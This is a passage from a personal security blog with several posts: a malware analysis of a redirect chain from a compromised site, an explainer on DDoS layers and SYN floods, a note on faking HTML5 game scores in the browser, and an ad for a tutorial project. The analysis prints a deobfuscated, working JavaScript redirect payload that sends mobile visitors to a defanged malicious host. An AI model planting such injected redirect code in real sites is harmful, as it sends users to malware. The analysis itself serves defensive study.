How to handle the redirection from malicious websites..!!

1 Comment

The journey starts with a link of website.

Where this link tell us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL is normal one if you ignore the .ru thing 🙂

When I tried to execute this one over my Browser they redirected me to

Then I have to use wget to get the download this file.

After downloading this file I tried to open this in Browser and again the same redirection. Grrr..

Let’s see the reply header

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

Ok so we all know the website is not down and it’s redirecting, as we have the code so let’s take look over the code which is redirecting us.

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious ok let’s see what virustotal say about this this website.


The above 2 are the URL with which I started with and another one is of


So, they got redirection over every webpage so I have to download every thing using wget and then to analyze it, no GUI only code 😦

2 different analysis anyways good thing is it’s still showing us that it is malicious 🙂

After downloading the 2nd file I analysed it and find out there are 2 java scripts in that one.

So, I downloaded those 2 files respectively and the link were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these 2 files. The virus total reports are

For core.js

For caption.js

Indeed they are malicious.

Time to take a look inside these 2


The malicious code is common for both of the files.

After decrypting it what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Which is finally redirecting you to


Next task was to get the payload as most probably this was the site where they have hidden the treasure.

But unfortunately this was down error 404

 Connecting to||:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought as there is redirection everywhere then this might be because of different location, So I tried it with proxy os US,Russia and some 3-4 more sut same result for every thing.

is it me or everyone else is unable to download the contents from this site?

ok let’s see the who is for the website

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you:

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information:

And in last snap shot of all the the files which I have gathered

Screen Shot 2013-05-18 at 5.55.55 PM

This was my Journey and this was the end.

Your Inputs / Criticism are required



What is DDOS layer 7 and Layer 4 and Low-Rate Ddos

1 Comment


Very recently some hacactivist named as Lulzsec and Anonymous were very famous because they use to hack some of the government website and they use to hack the data and all.

This brings my interest and to know how they are doing all this, as we all know as this is now pretty old and you might be knowing about Ddos but here I am telling you about Ddos layer 3 and 4 attack.

The attacks which are be done by hack activist was layer 7 attack and you may do this kind of attack is by simply pressing the refresh button over your browser.

If hundreds of thousands of people will do this then at some point of time the server will become irresponsible and so it so server stop serving the users.

But for this kind of Ddos we need too many computers some of them might knew that they are being part of this attack or sometimes the people got involved unknowingly as they are under some malware .

So what Layer 3 and layer 4 Ddos .

As the Anonymous got active there got 1 person active against them by the name of “th3j35tor”  who claimed to be ex Security personal.

It was the 1st time when I cam across this level of Ddos which he was executing through a 3G connection over cellphone and was taking down some 3-4 big servers by using just 1 connection.

So what exactly Layer 4 Attack is?

A Layer4 DoS attack is often referred to as a SYN flood. It works at the Transport Protocol (TCP) layer. A TCP connection is established in what is known as a 3-way hand shaking. The client sends a SYN packet, the server responds with a SYN ACK, and the client responds tothat with an ACK. After the “three-way handshake” is complete, the TCP connection is considered established. It is as this point that applications begin sending data using a Layer 7 or application layer protocol, such as HTTP.

A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK thatshould come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server.

SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the “endpoint” of the connection) it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity.

The attackers are generally stopped from flooding the network through the use of SYN cookies.  SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to allow a proxy/delivery solution with hardware accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server alleviates much of the gains achieved by preventing SYN floods and often results in available, but unacceptably slow performing servers and sites.

LDos (I got limited knowledge of this which I am sharing  if you got something more then do share that with me):

Low-rate Distributed Denial-of-Service (LDDoS) attacks send fewer packets to attack legitimate flows by exploiting the vulnerability in TCP’s congestion control mechanism.

They are difficult to detect while causing severe damage to TCP-based applications. Existing approaches can only detect the presence of an LDDoS attack, but fail to identify LDDoS flows. In this paper, we propose a novel metric – Congestion Participation Rate (CPR) – and a CPR-based approach to detect and filter LDDoS attacks by their intention to congest the network. The major innovation of the CPR-base approach is its ability to identify LDDoS flows.

A flow with a CPR higher than a predefined threshold is classified as an LDDoS flow, and consequently all of its packets will be dropped. We analyze the effectiveness of CPR theoretically by quantifying the average CPR difference between normal TCP flows and LDDoS flows and showing that CPR can differentiate them. We conduct ns-2 simulations, test-bed experiments, and Internet traffic trace analysis to validate our analytical results and evaluate the performance of the proposed approach. Experimental results demonstrate that the proposed CPR-based approach is substantially more effective compared to an existing Discrete Fourier Transform (DFT)-based approach


My project for the protection against DDos layer 7 attack.

I have created this Ddos protection script which is under the GPL license and it’s useful for protecting the server form leyer 7 Ddos protection.

This is useless for any of layer 3 and layer 4 Ddos attacks and a lot of code is still needed to be completed which I will be completing when got some free time.If you feel like completing then please go ahead and ask me what ever you feel like.

The Script can be download from here will GIT it ASAP.

I am sorry as the previous link was not working so I have uploaded it to GIT now you can get it form here, it’s under GPL license so you can use it for free 🙂

Hope you like this and do share your views.


HTML 5 and security

Leave a comment

Gaming is not just a mere time pass,it’s something much more than that.
Now people compete in gaming and there are prizes to be won, people use to spend money over gaming to keep their score more than others, even there are so dedicated gamers that use to play almost 24×7.
Working as an HTML 5 game developer with Mintango technologies and a security guy from passion I came up with this though this is something very common but still worth sharing.

I believe almost all of you know about recent google’s olympic special doodles, and some us are more interested in getting good score and getting all those 3 medal and then take a snapshot and paste it over Facebook.

If you are seeing some of your friend’s good score that doesn’t really mean that the person really scored that as if you know a little bit of HTML then it’s very easy to fake your score, I am taking about manipulating the score not Photoshop.

It’s as very simple just right-click over the doodle and click inspect element (I did this over google crome) and then it’s going to redirect you to the HTML code, now simply search for the numbers which represent your score and change it to what you need it to be.



change the value from 20 to 999
and this will be like

Image before changing anything

and now the medals change the class from class=”hplogo_smh” to class=”hplogo_smg”
and tada you got one of the best score.

Why I am telling this story?

Don’t you think it’s very easy, indeed it is. But the question is if this is that easy then is it worth creating some serious kind of games using HTML 5.
I am not a (superhero :P) flash guy but I know that it is that secure that we may create some serious kind of games with that, though companys like zapak and other some are creating games which use to record the final score and then they use to distribute prizes which attract gamers to log on into there site.

I am not saying that it have to be like castle but we need this to be secure, as anyone may easily manipulate the score or the content which we are sending on server which is used or the anlysis of our score and comaparision of players.

I must confess that I never tried this with some big game as for that I need official permission from the server owner, If you got one then I would love to do test over 🙂

Will come up how to make things more secure and what changes we need to make serious gaming more serious.


it’s not that secure yet.

If ou have any questions then you may mail me or comment here.

Spoken tutorials!!

Leave a comment A place where you may learn most of the Opensource technologies,Software and Languages too where language is not a bar. 🙂
Hey all this is my second post and I am going to tell you something great which you should have to know spoken tutorials 🙂
Have you ever heard about that?
It’s a project by which you may earn and learn simultaneously.
It’s a project by National Mission on Education through Information Communication through Technology, launched by MHRD, Govt of India.
It’s being controlled by IITB and they are organizing there workshops throughout the country.
On 2-3 of October,2010 Prof. Kannan Moudgalya was in Jaipur with his team where I met him and worked with him for 2 days and find out Spoken tutorial to be very interesting. There is a lot for each and everyone and biggest thing is it’s all about FOSS 😉
They are accepting tutorials over any of the FOSS technology or software and length of every tutorial is just 10 min and they are paying about 2.5K for every tutorial of 10 min 🙂
The biggest thing is they are not specific to any one language i.e. English or Hindi they are accepting it in all the major languages of India that means Language is no more a problem in learning something.
If you think that you may dube some tutorial into your native language if it is not available then go ahead and they are paying for that too.
All the videos are available FREE to watch if you just want to learn from it.
C00l!! B-)
Now what you are thinking how to create this tutorial how to dube any tutorial???
It’s not really a big deal just navigate to the website and you are going to get Video tutorial even on these things.

Campus Ambassador
There is a program for students for being campus ambassador. By being a campus ambassador you are going to be the one who is going to promote Spoken tutorials in your campus and it’s going to look good in you CV too 🙂
Camus ambassador link is here
and if you want to apply for campus ambassador then hit me
What I am contributing?
I am working on submitting Nmap tutorials in here.
So if you want to learn about how to use Nmap and it’s other features then just go to this website and watch them 🙂
These tutorials are under not completed yet will post the link as soon as the tutorials are completed. 🙂
Wiki Main page
Brochures are available over here

So, go and enjoy happy learning and earning.